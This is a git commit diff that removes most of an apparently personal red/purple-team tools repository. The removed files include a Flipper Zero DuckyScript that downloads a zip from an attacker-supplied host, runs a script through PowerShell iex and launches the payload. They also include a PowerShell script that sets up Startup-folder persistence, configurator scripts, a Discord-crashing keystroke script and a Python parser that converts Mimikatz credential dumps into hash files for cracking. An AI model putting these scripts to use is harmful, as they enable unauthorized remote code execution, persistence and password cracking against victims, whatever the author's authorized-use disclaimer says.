Initial commit

2023-10-29 01:09:20 -06:00
11 changed files with 1 additions and 226 deletions
@@ -1,23 +0,0 @@
 REM TITLE GooseDropper
 REM AUTHOR Fr3ki
 REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
 DELAY 500
 GUI r
 DELAY 500
 STRING powershell wget YOUR_IP/ZIP -OutFile $ENV:Temp/Update.zip
 ENTER
 DELAY 8000
 GUI r
 DELAY 500
 STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
 ENTER
 DELAY 3000
 GUI r
 DELAY 500
 STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
 ENTER
 DELAY 1000
 GUI r
 DELAY 500
 STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
 ENTER
@@ -1,6 +0,0 @@
 $WScriptShell = New-Object -ComObject WScript.Shell
 $TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
 $ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
 $Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
 $Shortcut.TargetPath = $TargetFile
 $Shortcut.Save()
@@ -1,25 +0,0 @@
 **======= Goose Dropper v2.0 ========**
 This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
 --------------------------------------------------------------------------------------------------------------
 **Important Notes:**
 Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
 All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
 **=== v2.0 Notes ==**
    Added persistence via a PowerShell script that makes a shortcut in the startup folder.
    Revamped updater with more options and better dialogue. 
    Bugfixes to ensure payloads get delivered successfully.
 **=== v2.1 Notes ==**
    Simplified configurators to remove unnecessary complexity
    Added Windows auto-configuration tool.
@@ -1,31 +0,0 @@
 #!/bin/bash
 IP=$1
 ZIP=$2
 PERSIST=$3
 #Ensure required arguments are not empty
 if [ "${IP}" == "" ] | [ "${ZIP}" == "" ];
 then
  echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
  exit
 fi
 #Check for help command
 if [ "${IP,,}" == "-h" ] | [ "${IP,,}" == "help" ];
 then
  echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
  exit
 fi
 #Replace placeholders with provided values
 sed -i "s/YOUR_IP/$IP/" GooseDropper.txt
 sed -i "s/ZIP/$ZIP/" GooseDropper.txt
 #Remove persistance if desired
 if [ "${PERSIST,,}" == "n" ];
 then
 	sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
 else
 	break
 fi
@@ -1,30 +0,0 @@
 param (
    [string]$HELP,
    [string]$IP,
    [string]$ZIP,
    [string]$PERSIST
 )
 # Ensure required arguments are not empty
 if (-not $IP -or -not $ZIP) {
    Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
    exit
 }
 # Check for help command
 if ($HELP) {
    Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
    exit
 }
 # Replace placeholders with provided values
 (Get-Content "GooseDropper.txt") | ForEach-Object { $_ -replace 'YOUR_IP', $IP -replace 'ZIP', $ZIP } | Set-Content "GooseDropper.txt"
 # Remove persistence if desired
 if ($PERSIST.ToLower() -eq "n") {
    $lines = Get-Content "GooseDropper.txt"
    $lines = $lines[0..14] + $lines[19..($lines.Length - 1)]
    Set-Content "GooseDropper.txt" $lines
 } else {
    break
 }
@@ -1,12 +0,0 @@
 # This specific "Exploit" has been patched and is no-longer usable.
 ---
 Kill_Discord is a duckyscript that does exactly what the name implies.
 As of April 2024 the string "http://./\<#0>:  ://./<#0>" without the quotes will crash your Discord client when pasted into any message box.
 This script opens Discord on the target machine and pastes that string into the first available text box.
 Just to reitterate this crashes the Discord client of the SENDER, hence the need for a duckyscript.
 As always, don't be a skid, and only use these scripts on devices which you are expresely authorized to use them on. I am not liable for any unauthorized usage or damage caused by the usage of this tool.
@@ -1,12 +0,0 @@
 DELAY 500
 GUI r
 DELAY 500
 STRING C:\ProgramData\%USERNAME%\Discord\Update.exe --processStart Discord.exe
 DELAY 500
 ENTER
 DELAY 2000
 CTRL k
 DELAY 100
 ENTER
 DELAY 500
 STRING http://./\<#0>:  ://./<#0>
@@ -1,6 +1,2 @@
 # Misadventures
-This is a set of Red and Purple team tools I've developed, mostly just for fun, but some may find them useful.
+Red/Purple-Team tools
 Feel free to leave tips, comments, or suggestion in the comments, on my website at https://fr3ki.xyz or my twitter @Fr3ki_
 Licence: https://www.gnu.org/licenses/gpl-3.0.html
@@ -1,14 +0,0 @@
 # Katz^2
 Katz Squared is a small python parser for Mimikatz log files, allowing for username/hash combos to be written to txt files, ready for use with Hashcat (you get the joke yet?) or John.
 ---
 Usage: `katz2.py [-h] -f/--file -m/--mode`
 -
 **Modes:** 
 - logonpasswords - Used for files containing the output of the mimikatz module of the same name.
 - cache -- Used for files containing the output of the lsadump::cache mimikatz module
 ---
 **License:**
 GPLv3 as all good software should be.
@@ -1,68 +0,0 @@
 import argparse
 parser = argparse.ArgumentParser()
 parser.add_argument("-f", "--file", help="Mimikatz output file", required=True)
 parser.add_argument("-m", "--mode", help="Mimikatz mode used to obtain the output logonpasswords|cache", required=True)
 args = parser.parse_args()
 def dump(creds):
    if isinstance(creds, list) and len(creds) >= 2:
        username = creds[0]
        hsh = creds[1]
        dumpfile = username+".txt"
        with open(dumpfile, "w+") as df:
            df.write(hsh)
    else:
        pass
 def sekurlsa():
    filename = args.file
    creds = []
    with open(filename) as f:
        for line in f:
            if "authentication" in line.lower():
                dump(creds)
                creds = []
            elif "username" in line.lower():
                username = line.split(":")[1].strip()
                if username.lower() in creds or username.lower() == "(null)":
                    pass
                else:
                    creds.append(username.lower())
            elif "ntlm" in line.lower():
                ntlm = line.strip().split(":")[1].strip()
                if ntlm in creds:
                    pass
                else:
                    creds.append(ntlm)
 def cache():
    filename = args.file
    creds = []
    with open(filename) as f:
        for line in f:
            if "nl$" in line.lower():
                print(creds)
                dump(creds)
                creds = []
            elif "user" in line.lower():
                username = line.split(":")[1].strip()
                if username.lower() in creds or username.lower() == "(null)":
                    pass
                else:
                    creds.append(username.lower())
            elif "mscachev2" in line.lower():
                mscache = line.strip().split(":")[1].strip()
                if mscache in creds:
                    pass
                else:
                    creds.append(mscache)
    print("[+] Credential pairs written to disk")
 if __name__ == "__main__":
    match args.mode:
        case "logonpasswords":
            sekurlsa()
        case "cache":
            cache()